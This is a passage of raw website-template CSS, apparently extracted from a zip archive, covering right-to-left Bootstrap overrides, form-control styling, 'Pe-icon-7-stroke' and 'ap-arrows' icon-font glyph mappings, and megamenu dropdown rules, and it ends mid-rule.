5px 15px}}@media (min-width:768px){.navbar-nav{float:right}.navbar-nav>li{float:right}}@media (min-width:768px){.navbar-left.flip{float:right!important}.navbar-right:last-child{margin-left:-15px;margin-right:auto}.navbar-right.flip{float:left!important;margin-left:-15px;margin-right:auto}.navbar-right .dropdown-menu{left:0;right:auto}}@media (min-width:768px){.navbar-text{float:right}.navbar-text.navbar-right:last-child{margin-left:0;margin-right:auto}}.pagination{padding-right:0}.pagination>li>a,.pagination>li>span{float:right;margin-right:-1px;margin-left:0}.pagination>li:first-child>a,.pagination>li:first-child>span{margin-left:0;border-bottom-right-radius:4px;border-top-right-radius:4px;border-bottom-left-radius:0;border-top-left-radius:0}.pagination>li:last-child>a,.pagination>li:last-child>span{margin-right:-1px;border-bottom-left-radius:4px;border-top-left-radius:4px;border-bottom-right-radius:0;border-top-right-radius:0}.pager{padding-right:0;padding-left:initial}.pager .next>a,.pager .next>span{float:left}.pager .previous>a,.pager .previous>span{float:right}.nav-pills>li>a>.badge{margin-left:0;margin-right:3px}.list-group-item>.badge{float:left}.list-group-item>.badge+.badge{margin-left:5px;margin-right:auto}.alert-dismissable,.alert-dismissible{padding-left:35px;padding-right:15px}.alert-dismissable .close,.alert-dismissible .close{right:auto;left:-21px}.progress-bar{float:right}.media>.pull-left{margin-right:10px}.media>.pull-left.flip{margin-right:0;margin-left:10px}.media>.pull-right{margin-left:10px}.media>.pull-right.flip{margin-left:0;margin-right:10px}.media-right,.media>.pull-right{padding-right:10px;padding-left:initial}.media-left,.media>.pull-left{padding-left:10px;padding-right:initial}.media-list{padding-right:0;padding-left:initial;list-style:none}.list-group{padding-right:0;padding-left:initial}.panel>.table:first-child>thead:first-child>tr:first-child td:first-child,.panel>.table-responsive:first-child>.table:first-child>thead:first-child>tr:first-child td:first-child,.panel>.table:first-child>tbody:first-child>tr:first-child td:first-child,.panel>.table-responsive:first-child>.table:first-child>tbody:first-child>tr:first-child td:first-child,.panel>.table:first-child>thead:first-child>tr:first-child th:first-child,.panel>.table-responsive:first-child>.table:first-child>thead:first-child>tr:first-child th:first-child,.panel>.table:first-child>tbody:first-child>tr:first-child th:first-child,.panel>.table-responsive:first-child>.table:first-child>tbody:first-child>tr:first-child th:first-child{border-top-right-radius:3px;border-top-left-radius:0}.panel>.table:first-child>thead:first-child>tr:first-child td:last-child,.panel>.table-responsive:first-child>.table:first-child>thead:first-child>tr:first-child td:last-child,.panel>.table:first-child>tbody:first-child>tr:first-child td:last-child,.panel>.table-responsive:first-child>.table:first-child>tbody:first-child>tr:first-child td:last-child,.panel>.table:first-child>thead:first-child>tr:first-child th:last-child,.panel>.table-responsive:first-child>.table:first-child>thead:first-child>tr:first-child th:last-child,.panel>.table:first-child>tbody:first-child>tr:first-child th:last-child,.panel>.table-responsive:first-child>.table:first-child>tbody:first-child>tr:first-child th:last-child{border-top-left-radius:3px;border-top-right-radius:0}.panel>.table:last-child>tbody:last-child>tr:last-child td:first-child,.panel>.table-responsive:last-child>.table:last-child>tbody:last-child>tr:last-child td:first-child,.panel>.table:last-child>tfoot:last-child>tr:last-child td:first-child,.panel>.table-responsive:last-child>.table:last-child>tfoot:last-child>tr:last-child td:first-child,.panel>.table:last-child>tbody:last-child>tr:last-child th:first-child,.panel>.table-responsive:last-child>.table:last-child>tbody:last-child>tr:last-child th:first-child,.panel>.table:last-child>tfoot:last-child>tr:last-child th:first-child,.panel>.table-responsive:last-child>.table:last-child>tfoot:last-child>tr:last-child th:first-child{border-bottom-left-radius:3px;border-top-right-radius:0}.panel>.table:last-child>tbody:last-child>tr:last-child td:last-child,.panel>.table-responsive:last-child>.table:last-child>tbody:last-child>tr:last-child td:last-child,.panel>.table:last-child>tfoot:last-child>tr:last-child td:last-child,.panel>.table-responsive:last-child>.table:last-child>tfoot:last-child>tr:last-child td:last-child,.panel>.table:last-child>tbody:last-child>tr:last-child th:last-child,.panel>.table-responsive:last-child>.table:last-child>tbody:last-child>tr:last-child th:last-child,.panel>.table:last-child>tfoot:last-child>tr:last-child th:last-child,.panel>.table-responsive:last-child>.table:last-child>tfoot:last-child>tr:last-child th:last-child{border-bottom-right-radius:3px;border-top-left-radius:0}.panel>.table-bordered>thead>tr>th:first-child,.panel>.table-responsive>.table-bordered>thead>tr>th:first-child,.panel>.table-bordered>tbody>tr>th:first-child,.panel>.table-responsive>.table-bordered>tbody>tr>th:first-child,.panel>.table-bordered>tfoot>tr>th:first-child,.panel>.table-responsive>.table-bordered>tfoot>tr>th:first-child,.panel>.table-bordered>thead>tr>td:first-child,.panel>.table-responsive>.table-bordered>thead>tr>td:first-child,.panel>.table-bordered>tbody>tr>td:first-child,.panel>.table-responsive>.table-bordered>tbody>tr>td:first-child,.panel>.table-bordered>tfoot>tr>td:first-child,.panel>.table-responsive>.table-bordered>tfoot>tr>td:first-child{border-right:0;border-left:none}.panel>.table-bordered>thead>tr>th:last-child,.panel>.table-responsive>.table-bordered>thead>tr>th:last-child,.panel>.table-bordered>tbody>tr>th:last-child,.panel>.table-responsive>.table-bordered>tbody>tr>th:last-child,.panel>.table-bordered>tfoot>tr>th:last-child,.panel>.table-responsive>.table-bordered>tfoot>tr>th:last-child,.panel>.table-bordered>thead>tr>td:last-child,.panel>.table-responsive>.table-bordered>thead>tr>td:last-child,.panel>.table-bordered>tbody>tr>td:last-child,.panel>.table-responsive>.table-bordered>tbody>tr>td:last-child,.panel>.table-bordered>tfoot>tr>td:last-child,.panel>.table-responsive>.table-bordered>tfoot>tr>td:last-child{border-right:none;border-left:0}.embed-responsive .embed-responsive-item,.embed-responsive iframe,.embed-responsive embed,.embed-responsive object{right:0;left:auto}.close{float:left}.modal-footer{text-align:left}.modal-footer .btn+.btn{margin-left:auto;margin-right:5px}.modal-footer .btn-group .btn+.btn{margin-right:-1px;margin-left:auto}.modal-footer .btn-block+.btn-block{margin-right:0;margin-left:auto}.popover{left:auto;text-align:right}.popover.top>.arrow{right:50%;left:auto;margin-right:-11px;margin-left:auto}.popover.top>.arrow:after{margin-right:-10px;margin-left:auto}.popover.bottom>.arrow{right:50%;left:auto;margin-right:-11px;margin-left:auto}.popover.bottom>.arrow:after{margin-right:-10px;margin-left:auto}.carousel-control{right:0;bottom:0}.carousel-control.left{right:auto;left:0;background-image:-webkit-linear-gradient(left,color-stop(rgba(0,0,0,.5) 0),color-stop(rgba(0,0,0,.0001) 100%));background-image:-o-linear-gradient(left,rgba(0,0,0,.5) 0,rgba(0,0,0,.0001) 100%);background-image:linear-gradient(to right,rgba(0,0,0,.5) 0,rgba(0,0,0,.0001) 100%);background-repeat:repeat-x;filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#80000000', endColorstr='#00000000', GradientType=1)}.carousel-control.right{left:auto;right:0;background-image:-webkit-linear-gradient(left,color-stop(rgba(0,0,0,.0001) 0),color-stop(rgba(0,0,0,.5) 100%));background-image:-o-linear-gradient(left,rgba(0,0,0,.0001) 0,rgba(0,0,0,.5) 100%);background-image:linear-gradient(to right,rgba(0,0,0,.0001) 0,rgba(0,0,0,.5) 100%);background-repeat:repeat-x;filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#00000000', endColorstr='#80000000', GradientType=1)}.carousel-control .icon-prev,.carousel-control .glyphicon-chevron-left{left:50%;right:auto;margin-right:-10px}.carousel-control .icon-next,.carousel-control .glyphicon-chevron-right{right:50%;left:auto;margin-left:-10px}.carousel-indicators{right:50%;left:0;margin-right:-30%;margin-left:0;padding-left:0}@media screen and (min-width:768px){.carousel-control .glyphicon-chevron-left,.carousel-control .icon-prev{margin-left:0;margin-right:-15px}.carousel-control .glyphicon-chevron-right,.carousel-control .icon-next{margin-left:0;margin-right:-15px}.carousel-caption{left:20%;right:20%;padding-bottom:30px}}.pull-right.flip{float:left!important}.pull-left.flip{float:right!important}PK!4�8����flex/css/template.cssnu&1i�.form-control {
  display: block;
  height: 34px;
  padding: 6px 12px;
  font-size: 14px;
  line-height: 1.428571429;
  color: #555555;
  background-color: #fff;
  background-image: none;
  border: 1px solid #ccc;
  border-radius: 4px;
  -webkit-box-shadow: inset 0 1px 1px rgba(0,0,0,0.075);
  box-shadow: inset 0 1px 1px rgba(0,0,0,0.075);
  -webkit-transition: border-color ease-in-out .15s, box-shadow ease-in-out .15s;
  -moz-transition: border-color ease-in-out .15s, box-shadow ease-in-out .15s;
  -o-transition: border-color ease-in-out .15s, box-shadow ease-in-out .15s;
  transition: border-color ease-in-out .15s, box-shadow ease-in-out .15s;
}
.form-control:focus {
  border-color: #66afe9;
  outline: 0;
  -webkit-box-shadow: inset 0 1px 1px rgba(0,0,0,.075), 0 0 8px rgba(102,175,233,0.6);
  box-shadow: inset 0 1px 1px rgba(0,0,0,.075), 0 0 8px rgba(102,175,233,0.6);
}
.form-control::-moz-placeholder {
  color: #999;
  opacity: 1;
}
.form-control:-ms-input-placeholder {
  color: #999;
}
.form-control::-webkit-input-placeholder {
  color: #999;
}
.form-control[disabled],
.form-control[readonly],
fieldset[disabled] .form-control {
  cursor: not-allowed;
  background-color: #eeeeee;
  opacity: 1;
}
textarea.form-control {
  height: auto;
}
@font-face {
  font-family: 'ap-arrows';
  src: url('../fonts/ap-arrows/ap-arrows.eot?4rtkxz');
  src: url('../fonts/ap-arrows/ap-arrows.eot?#iefix4rtkxz') format('embedded-opentype'), url('../fonts/ap-arrows/ap-arrows.woff?4rtkxz') format('woff'), url('../fonts/ap-arrows/ap-arrows.ttf?4rtkxz') format('truetype'), url('../fonts/ap-arrows/ap-arrows.svg?4rtkxz#ap-arrows') format('svg');
  font-weight: normal;
  font-style: normal;
}
.ap-left:before {
  content: "\e600";
}
.ap-right:before {
  content: "\e601";
}
.ap-left-2:before {
  content: "\e602";
}
.ap-right-2:before {
  content: "\e603";
}
.ap-left-3:before {
  content: "\e604";
}
.ap-right-3:before {
  content: "\e605";
}
.ap-arrow-left:before {
  content: "\e606";
}
.ap-arrow-right:before {
  content: "\e607";
}
.ap-close:before {
  content: "\e608";
}
.ap-minus-1:before {
  content: "\e609";
}
.ap-plus-1:before {
  content: "\e60a";
}
.ap-minus-2:before {
  content: "\e60b";
}
.ap-plus-2:before {
  content: "\e60c";
}
@font-face {
  font-family: 'peIcon7';
  src: url('../fonts/fonts/Pe-icon-7-stroke.eot?d7yf1v');
  src: url('../fonts/Pe-icon-7-stroke.eot?#iefixd7yf1v') format('embedded-opentype'), url('../fonts/Pe-icon-7-stroke.woff?d7yf1v') format('woff'), url('../fonts/Pe-icon-7-stroke.ttf?d7yf1v') format('truetype'), url('../fonts/Pe-icon-7-stroke.svg?d7yf1v#Pe-icon-7-stroke') format('svg');
  font-weight: normal;
  font-style: normal;
}
[class^="pe-7s-"],
[class*=" pe-7s-"] {
  display: inline-block;
  font-family: 'peIcon7';
  speak: none;
  font-style: normal;
  font-weight: normal;
  font-variant: normal;
  text-transform: none;
  line-height: 1;
  -webkit-font-smoothing: antialiased;
  -moz-osx-font-smoothing: grayscale;
}
.pe-7s-album:before {
  content: "\e6aa";
}
.pe-7s-arc:before {
  content: "\e6ab";
}
.pe-7s-back-2:before {
  content: "\e6ac";
}
.pe-7s-bandaid:before {
  content: "\e6ad";
}
.pe-7s-car:before {
  content: "\e6ae";
}
.pe-7s-diamond:before {
  content: "\e6af";
}
.pe-7s-door-lock:before {
  content: "\e6b0";
}
.pe-7s-eyedropper:before {
  content: "\e6b1";
}
.pe-7s-female:before {
  content: "\e6b2";
}
.pe-7s-gym:before {
  content: "\e6b3";
}
.pe-7s-hammer:before {
  content: "\e6b4";
}
.pe-7s-headphones:before {
  content: "\e6b5";
}
.pe-7s-helm:before {
  content: "\e6b6";
}
.pe-7s-hourglass:before {
  content: "\e6b7";
}
.pe-7s-leaf:before {
  content: "\e6b8";
}
.pe-7s-magic-wand:before {
  content: "\e6b9";
}
.pe-7s-male:before {
  content: "\e6ba";
}
.pe-7s-map-2:before {
  content: "\e6bb";
}
.pe-7s-next-2:before {
  content: "\e6bc";
}
.pe-7s-paint-bucket:before {
  content: "\e6bd";
}
.pe-7s-pendrive:before {
  content: "\e6be";
}
.pe-7s-photo:before {
  content: "\e6bf";
}
.pe-7s-piggy:before {
  content: "\e6c0";
}
.pe-7s-plugin:before {
  content: "\e6c1";
}
.pe-7s-refresh-2:before {
  content: "\e6c2";
}
.pe-7s-rocket:before {
  content: "\e6c3";
}
.pe-7s-settings:before {
  content: "\e6c4";
}
.pe-7s-shield:before {
  content: "\e6c5";
}
.pe-7s-smile:before {
  content: "\e6c6";
}
.pe-7s-usb:before {
  content: "\e6c7";
}
.pe-7s-vector:before {
  content: "\e6c8";
}
.pe-7s-wine:before {
  content: "\e6c9";
}
.pe-7s-cloud-upload:before {
  content: "\e68a";
}
.pe-7s-cash:before {
  content: "\e68c";
}
.pe-7s-close:before {
  content: "\e680";
}
.pe-7s-bluetooth:before {
  content: "\e68d";
}
.pe-7s-cloud-download:before {
  content: "\e68b";
}
.pe-7s-way:before {
  content: "\e68e";
}
.pe-7s-close-circle:before {
  content: "\e681";
}
.pe-7s-id:before {
  content: "\e68f";
}
.pe-7s-angle-up:before {
  content: "\e682";
}
.pe-7s-wristwatch:before {
  content: "\e690";
}
.pe-7s-angle-up-circle:before {
  content: "\e683";
}
.pe-7s-world:before {
  content: "\e691";
}
.pe-7s-angle-right:before {
  content: "\e684";
}
.pe-7s-volume:before {
  content: "\e692";
}
.pe-7s-angle-right-circle:before {
  content: "\e685";
}
.pe-7s-users:before {
  content: "\e693";
}
.pe-7s-angle-left:before {
  content: "\e686";
}
.pe-7s-user-female:before {
  content: "\e694";
}
.pe-7s-angle-left-circle:before {
  content: "\e687";
}
.pe-7s-up-arrow:before {
  content: "\e695";
}
.pe-7s-angle-down:before {
  content: "\e688";
}
.pe-7s-switch:before {
  content: "\e696";
}
.pe-7s-angle-down-circle:before {
  content: "\e689";
}
.pe-7s-scissors:before {
  content: "\e697";
}
.pe-7s-wallet:before {
  content: "\e600";
}
.pe-7s-safe:before {
  content: "\e698";
}
.pe-7s-volume2:before {
  content: "\e601";
}
.pe-7s-volume1:before {
  content: "\e602";
}
.pe-7s-voicemail:before {
  content: "\e603";
}
.pe-7s-video:before {
  content: "\e604";
}
.pe-7s-user:before {
  content: "\e605";
}
.pe-7s-upload:before {
  content: "\e606";
}
.pe-7s-unlock:before {
  content: "\e607";
}
.pe-7s-umbrella:before {
  content: "\e608";
}
.pe-7s-trash:before {
  content: "\e609";
}
.pe-7s-tools:before {
  content: "\e60a";
}
.pe-7s-timer:before {
  content: "\e60b";
}
.pe-7s-ticket:before {
  content: "\e60c";
}
.pe-7s-target:before {
  content: "\e60d";
}
.pe-7s-sun:before {
  content: "\e60e";
}
.pe-7s-study:before {
  content: "\e60f";
}
.pe-7s-stopwatch:before {
  content: "\e610";
}
.pe-7s-star:before {
  content: "\e611";
}
.pe-7s-speaker:before {
  content: "\e612";
}
.pe-7s-signal:before {
  content: "\e613";
}
.pe-7s-shuffle:before {
  content: "\e614";
}
.pe-7s-shopbag:before {
  content: "\e615";
}
.pe-7s-share:before {
  content: "\e616";
}
.pe-7s-server:before {
  content: "\e617";
}
.pe-7s-search:before {
  content: "\e618";
}
.pe-7s-film:before {
  content: "\e6a5";
}
.pe-7s-science:before {
  content: "\e619";
}
.pe-7s-disk:before {
  content: "\e6a6";
}
.pe-7s-ribbon:before {
  content: "\e61a";
}
.pe-7s-repeat:before {
  content: "\e61b";
}
.pe-7s-refresh:before {
  content: "\e61c";
}
.pe-7s-add-user:before {
  content: "\e6a9";
}
.pe-7s-refresh-cloud:before {
  content: "\e61d";
}
.pe-7s-paperclip:before {
  content: "\e69c";
}
.pe-7s-radio:before {
  content: "\e61e";
}
.pe-7s-note2:before {
  content: "\e69d";
}
.pe-7s-print:before {
  content: "\e61f";
}
.pe-7s-network:before {
  content: "\e69e";
}
.pe-7s-prev:before {
  content: "\e620";
}
.pe-7s-mute:before {
  content: "\e69f";
}
.pe-7s-power:before {
  content: "\e621";
}
.pe-7s-medal:before {
  content: "\e6a0";
}
.pe-7s-portfolio:before {
  content: "\e622";
}
.pe-7s-like2:before {
  content: "\e6a1";
}
.pe-7s-plus:before {
  content: "\e623";
}
.pe-7s-left-arrow:before {
  content: "\e6a2";
}
.pe-7s-play:before {
  content: "\e624";
}
.pe-7s-key:before {
  content: "\e6a3";
}
.pe-7s-plane:before {
  content: "\e625";
}
.pe-7s-joy:before {
  content: "\e6a4";
}
.pe-7s-photo-gallery:before {
  content: "\e626";
}
.pe-7s-pin:before {
  content: "\e69b";
}
.pe-7s-phone:before {
  content: "\e627";
}
.pe-7s-plug:before {
  content: "\e69a";
}
.pe-7s-pen:before {
  content: "\e628";
}
.pe-7s-right-arrow:before {
  content: "\e699";
}
.pe-7s-paper-plane:before {
  content: "\e629";
}
.pe-7s-delete-user:before {
  content: "\e6a7";
}
.pe-7s-paint:before {
  content: "\e62a";
}
.pe-7s-bottom-arrow:before {
  content: "\e6a8";
}
.pe-7s-notebook:before {
  content: "\e62b";
}
.pe-7s-note:before {
  content: "\e62c";
}
.pe-7s-next:before {
  content: "\e62d";
}
.pe-7s-news-paper:before {
  content: "\e62e";
}
.pe-7s-musiclist:before {
  content: "\e62f";
}
.pe-7s-music:before {
  content: "\e630";
}
.pe-7s-mouse:before {
  content: "\e631";
}
.pe-7s-more:before {
  content: "\e632";
}
.pe-7s-moon:before {
  content: "\e633";
}
.pe-7s-monitor:before {
  content: "\e634";
}
.pe-7s-micro:before {
  content: "\e635";
}
.pe-7s-menu:before {
  content: "\e636";
}
.pe-7s-map:before {
  content: "\e637";
}
.pe-7s-map-marker:before {
  content: "\e638";
}
.pe-7s-mail:before {
  content: "\e639";
}
.pe-7s-mail-open:before {
  content: "\e63a";
}
.pe-7s-mail-open-file:before {
  content: "\e63b";
}
.pe-7s-magnet:before {
  content: "\e63c";
}
.pe-7s-loop:before {
  content: "\e63d";
}
.pe-7s-look:before {
  content: "\e63e";
}
.pe-7s-lock:before {
  content: "\e63f";
}
.pe-7s-lintern:before {
  content: "\e640";
}
.pe-7s-link:before {
  content: "\e641";
}
.pe-7s-like:before {
  content: "\e642";
}
.pe-7s-light:before {
  content: "\e643";
}
.pe-7s-less:before {
  content: "\e644";
}
.pe-7s-keypad:before {
  content: "\e645";
}
.pe-7s-junk:before {
  content: "\e646";
}
.pe-7s-info:before {
  content: "\e647";
}
.pe-7s-home:before {
  content: "\e648";
}
.pe-7s-help2:before {
  content: "\e649";
}
.pe-7s-help1:before {
  content: "\e64a";
}
.pe-7s-graph3:before {
  content: "\e64b";
}
.pe-7s-graph2:before {
  content: "\e64c";
}
.pe-7s-graph1:before {
  content: "\e64d";
}
.pe-7s-graph:before {
  content: "\e64e";
}
.pe-7s-global:before {
  content: "\e64f";
}
.pe-7s-gleam:before {
  content: "\e650";
}
.pe-7s-glasses:before {
  content: "\e651";
}
.pe-7s-gift:before {
  content: "\e652";
}
.pe-7s-folder:before {
  content: "\e653";
}
.pe-7s-flag:before {
  content: "\e654";
}
.pe-7s-filter:before {
  content: "\e655";
}
.pe-7s-file:before {
  content: "\e656";
}
.pe-7s-expand1:before {
  content: "\e657";
}
.pe-7s-exapnd2:before {
  content: "\e658";
}
.pe-7s-edit:before {
  content: "\e659";
}
.pe-7s-drop:before {
  content: "\e65a";
}
.pe-7s-drawer:before {
  content: "\e65b";
}
.pe-7s-download:before {
  content: "\e65c";
}
.pe-7s-display2:before {
  content: "\e65d";
}
.pe-7s-display1:before {
  content: "\e65e";
}
.pe-7s-diskette:before {
  content: "\e65f";
}
.pe-7s-date:before {
  content: "\e660";
}
.pe-7s-cup:before {
  content: "\e661";
}
.pe-7s-culture:before {
  content: "\e662";
}
.pe-7s-crop:before {
  content: "\e663";
}
.pe-7s-credit:before {
  content: "\e664";
}
.pe-7s-copy-file:before {
  content: "\e665";
}
.pe-7s-config:before {
  content: "\e666";
}
.pe-7s-compass:before {
  content: "\e667";
}
.pe-7s-comment:before {
  content: "\e668";
}
.pe-7s-coffee:before {
  content: "\e669";
}
.pe-7s-cloud:before {
  content: "\e66a";
}
.pe-7s-clock:before {
  content: "\e66b";
}
.pe-7s-check:before {
  content: "\e66c";
}
.pe-7s-chat:before {
  content: "\e66d";
}
.pe-7s-cart:before {
  content: "\e66e";
}
.pe-7s-camera:before {
  content: "\e66f";
}
.pe-7s-call:before {
  content: "\e670";
}
.pe-7s-calculator:before {
  content: "\e671";
}
.pe-7s-browser:before {
  content: "\e672";
}
.pe-7s-box2:before {
  content: "\e673";
}
.pe-7s-box1:before {
  content: "\e674";
}
.pe-7s-bookmarks:before {
  content: "\e675";
}
.pe-7s-bicycle:before {
  content: "\e676";
}
.pe-7s-bell:before {
  content: "\e677";
}
.pe-7s-battery:before {
  content: "\e678";
}
.pe-7s-ball:before {
  content: "\e679";
}
.pe-7s-back:before {
  content: "\e67a";
}
.pe-7s-attention:before {
  content: "\e67b";
}
.pe-7s-anchor:before {
  content: "\e67c";
}
.pe-7s-albums:before {
  content: "\e67d";
}
.pe-7s-alarm:before {
  content: "\e67e";
}
.pe-7s-airplay:before {
  content: "\e67f";
}
.pe-lg {
  font-size: 1.3333333333333333em;
  line-height: 0.75em;
  vertical-align: -15%;
}
.pe-2x {
  font-size: 2em;
}
.pe-3x {
  font-size: 3em;
}
.pe-4x {
  font-size: 4em;
}
.pe-5x {
  font-size: 5em;
}
.pe-fw {
  width: 1.2857142857142858em;
  text-align: center;
}
.pe-ul {
  padding-left: 0;
  margin-left: 2.142857142857143em;
  list-style-type: none;
}
.pe-ul > li {
  position: relative;
}
.pe-li {
  position: absolute;
  left: -2.1428571428571em;
  width: 2.142857142857143em;
  top: 0.14285714285714285em;
  text-align: center;
}
.pe-li.pe-lg {
  left: -1.8571428571429em;
}
.pe-border {
  padding: .2em .25em .15em;
  border: solid 0.08em #eeeeee;
  border-radius: .1em;
}
.pull-right {
  float: right;
}
.pull-left {
  float: left;
}
.pe.pull-left {
  margin-right: .3em;
}
.pe.pull-right {
  margin-left: .3em;
}
.pe-spin {
  -webkit-animation: spin 2s infinite linear;
  -moz-animation: spin 2s infinite linear;
  -o-animation: spin 2s infinite linear;
  animation: spin 2s infinite linear;
}
@-moz-keyframes spin {
  0% {
    -moz-transform: rotate(0deg);
  }
  100% {
    -moz-transform: rotate(359deg);
  }
}
@-webkit-keyframes spin {
  0% {
    -webkit-transform: rotate(0deg);
  }
  100% {
    -webkit-transform: rotate(359deg);
  }
}
@-o-keyframes spin {
  0% {
    -o-transform: rotate(0deg);
  }
  100% {
    -o-transform: rotate(359deg);
  }
}
@keyframes spin {
  0% {
    transform: rotate(0deg);
  }
  100% {
    transform: rotate(359deg);
  }
}
.pe-rotate-90 {
  filter: progid:DXImageTransform.Microsoft.BasicImage(rotation=1);
  -webkit-transform: rotate(90deg);
  -moz-transform: rotate(90deg);
  -ms-transform: rotate(90deg);
  -o-transform: rotate(90deg);
  transform: rotate(90deg);
}
.pe-rotate-180 {
  filter: progid:DXImageTransform.Microsoft.BasicImage(rotation=2);
  -webkit-transform: rotate(180deg);
  -moz-transform: rotate(180deg);
  -ms-transform: rotate(180deg);
  -o-transform: rotate(180deg);
  transform: rotate(180deg);
}
.pe-rotate-270 {
  filter: progid:DXImageTransform.Microsoft.BasicImage(rotation=3);
  -webkit-transform: rotate(270deg);
  -moz-transform: rotate(270deg);
  -ms-transform: rotate(270deg);
  -o-transform: rotate(270deg);
  transform: rotate(270deg);
}
.pe-flip-horizontal {
  filter: progid:DXImageTransform.Microsoft.BasicImage(rotation=0,mirror=1);
  -webkit-transform: scale(-1,1);
  -moz-transform: scale(-1,1);
  -ms-transform: scale(-1,1);
  -o-transform: scale(-1,1);
  transform: scale(-1,1);
}
.pe-flip-vertical {
  filter: progid:DXImageTransform.Microsoft.BasicImage(rotation=2,mirror=1);
  -webkit-transform: scale(1,-1);
  -moz-transform: scale(1,-1);
  -ms-transform: scale(1,-1);
  -o-transform: scale(1,-1);
  transform: scale(1,-1);
}
.pe-stack {
  position: relative;
  display: inline-block;
  width: 2em;
  height: 2em;
  line-height: 2em;
  vertical-align: middle;
}
.pe-stack-1x,
.pe-stack-2x {
  position: absolute;
  left: 0;
  width: 100%;
  text-align: center;
}
.pe-stack-1x {
  line-height: inherit;
}
.pe-stack-2x {
  font-size: 2em;
}
.pe-inverse {
  color: #ffffff;
}
.pe-va {
  vertical-align: middle;
}
.pe-border {
  border: solid 0.08em #eaeaea;
}
[class^="pe-7s-"],
[class*=" pe-7s-"] {
  display: inline-block;
}
.sp-megamenu-wrapper .sp-megamenu-parent .hide-it,
.sp-megamenu-wrapper .sp-megamenu-parent .separator .hide-it {
  display: none;
}
.sp-megamenu-parent {
  list-style: none;
  padding: 0;
  margin: 0 auto;
  display: block;
}
.sp-megamenu-parent >li {
  display: inline-block;
  position: relative;
  padding: 0;
}
.sp-megamenu-parent >li.menu-justify {
  position: static;
}
.sp-megamenu-parent >li >a {
  display: inline-block;
  padding: 0 12px;
  -webkit-transform: translateZ(0);
}
.sp-megamenu-parent >li >a >i {
  text-align: center;
  display: inline-table;
  min-width: 1.7em;
}
.sp-megamenu-parent >li .nav-header,
.sp-megamenu-parent >li .separator,
.sp-megamenu-parent >li .separator > a {
  cursor: default !important;
}
.sp-megamenu-parent >li.sp-has-child>a:after {
  font-family: "peIcon7";
  content: "\e688";
  padding: 0 3px;
  vertical-align: middle;
  font-size: 90%;
  opacity: .9;
  border: 0;
  -webkit-transition: opacity .3s ease-in-out;
  -moz-transition: opacity .3s ease-in-out;
  -o-transition: opacity .3s ease-in-out;
  transition: opacity .3s ease-in-out;
}
.sp-megamenu-parent >li.sp-has-child>a:hover:after {
  font-family: "peIcon7";
  content: "\e680";
  opacity: .7;
  border: 0;
}
.sp-megamenu-parent .sp-mega-group {
  list-style: none;
  padding: 0;
  margin: 0 !important;
}
.sp-megamenu-parent .sp-mega-group .sp-mega-group-child {
  list-style: none;
  padding: 0;
  margin: 0;
}
.sp-megamenu-parent .sp-dropdown {
  margin: 0;
  padding: 0;
  position: absolute;
  z-index: 10;
  display: none;
  visibility: hidden;
  width: 100%;
}
.sp-megamenu-parent .sp-dropdown .sp-dropdown-inner {
  background: inherit;
  box-shadow: 0 3px 5px 0 rgba(0,0,0,0.2);
  padding: 10px;
}
.sp-megamenu-parent .sp-dropdown .sp-dropdown-items {
  list-style: none;
  padding: 0;
  margin: 0;
}
.sp-megamenu-parent .sp-dropdown .sp-dropdown-items .sp-has-child >a {
  border: 0;
}
.sp-megamenu-parent .sp-dropdown .sp-dropdown-items .sp-has-child >a:after {
  font-family: "peIcon7";
  content: "\e684";
  border: 0;
  float: right;
  padding: 0;
  vertical-align: middle;
  font-size: 100%;
  opacity: 0.9;
  -webkit-transition: all .3s ease-in-out;
  -moz-transition: all .3s ease-in-out;
  -o-transition: all .3s ease-in-out;
  transition: all .3s ease-in-out;
}
.sp-megamenu-parent .sp-dropdown .sp-dropdown-items .sp-has-child >a:hover:after {
  font-family: "peIcon7";
  content: "\e688";
  opacity: 1;
  border: 0;
}
.sp-megamenu-parent .sp-dropdown.sp-menu-center {
  margin-left: 45px;
}
.sp-megamenu-parent .sp-dropdown.sp-dropdown-main {
  top: 100%;
}
.sp-megamenu-parent .sp-dropdown.sp-dropdown-main.sp-menu-right {
  left: 0;
}
.sp-megamenu-parent .sp-dropdown.sp-dropdown-main.sp-menu-full {
  left: 0;
  right: 0;
  margin: 0 auto;
}
.sp-megamenu-parent .sp-dropdown.sp-dropdown-main.sp-menu-left {
  right: 0;
}
.sp-megamenu-parent .sp-dropdown.sp-dropdown-sub {
  top: -10px;
  left: 100%;
  border-top: 0;
  border-bottom: 0;
  border-left: 10px solid transparent;
  border-right: 10px solid transparent;
}
.sp-megamenu-parent .sp-dropdown.sp-dropdown-sub .sp-dropdown-inner {
  box-shadow: 0 0 5px rgba(0,0,0,0.2);
}
.sp-megamenu-parent .sp-dropdown li.sp-menu-item {
  display: block;
  padding: 0;
  position: relative;
}
.sp-megamenu-parent .sp-dropdown li.sp-menu-item >a {
  display: block;
  padding: 5px 10px;
  margin-bottom: 2px;
  color: #333;
  cursor: pointer;
  font-size: 90%;
}
.sp-megamenu-parent .sp-dropdown li.sp-menu-item >a.sp-group-title {
  text-transform: uppercase;
  font-weight: bold;
}
.sp-megamenu-parent .sp-dropdown li.sp-menu-item >a >i {
  text-align: center;
  padding-right: 5px;
  min-width: 1.4em;
  opacity: 0.8;
}
.sp-megamenu-parent .sp-dropdown li.sp-menu-item >a:hover {
  color: #fff;
  border-radius: 3px;
}
.sp-megamenu-parent .sp-dropdown li.sp-menu-item >a:hover >i {
  opacity: 1;
}
.sp-megamenu-parent .sp-dropdown li.sp-menu-item.active>a>i {
  opacity: 1;
}
.sp-megamenu-parent .sp-dropdown li.sp-menu-item.current-item>a {
  border-radius: 3px;
}
.sp-megamenu-parent .sp-dropdown li.sp-menu-item.separator >a {
  line-height: 2;
  margin-bottom: 10px;
}
.sp-megamenu-parent .sp-dropdown-mega .sp-dropdown-inner >.row {
  margin-top: 30px;
}
.sp-megamenu-parent .sp-dropdown-mega .sp-dropdown-inner >.row:first-child {
  margin-top: 0;
}
.sp-megamenu-parent .sp-dropdown-mega .sp-dropdown-inner >.row div:last-child .sp-mega-group {
  padding: 0;
  margin: 0 0 0 -20px;
  border-right: none;
}
.sp-megamenu-parent .sp-has-child:hover >.sp-dropdown {
  display: block;
  visibility: visible;
}
.sp-megamenu-parent.menu-fade .sp-has-child >.sp-dropdown {
  display: block;
  opacity: 0;
  visibility: hidden;
  -webkit-transform: translate3d(0,0,0);
  -moz-transform: translate3d(0,0,0);
  transform: translate3d(0,0,0);
  -webkit-transition: opacity .35s ease, visibility .35s ease;
